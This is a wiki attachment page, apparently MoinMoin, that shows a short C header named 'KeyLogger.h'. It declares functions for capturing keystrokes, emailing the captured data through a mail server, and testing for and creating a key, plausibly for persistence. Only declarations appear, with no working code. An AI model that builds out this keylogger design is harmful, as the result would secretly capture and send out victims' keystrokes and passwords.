Attachment 'KeyLogger.h'
Download
Toggle line numbers
1 #pragma once
2
3 #include <stdio.h>
4 #include <tchar.h>
5
6 #define BUFSIZE 800
7 #define waittime 500
8
9 int MailIt (char *mailserver, char *emailto, char *emailfrom, char *emailsubject, char *emailmessage);
10 int get_keys();
11 int test_key(void);
12 int create_key(char *path);
Attached Files
To refer to attachments on a page, use attachment:filename, as shown below in the list of files. Do NOT use the URL of the [get] link, since this is subject to change and can break easily.You are not allowed to attach a file to this page.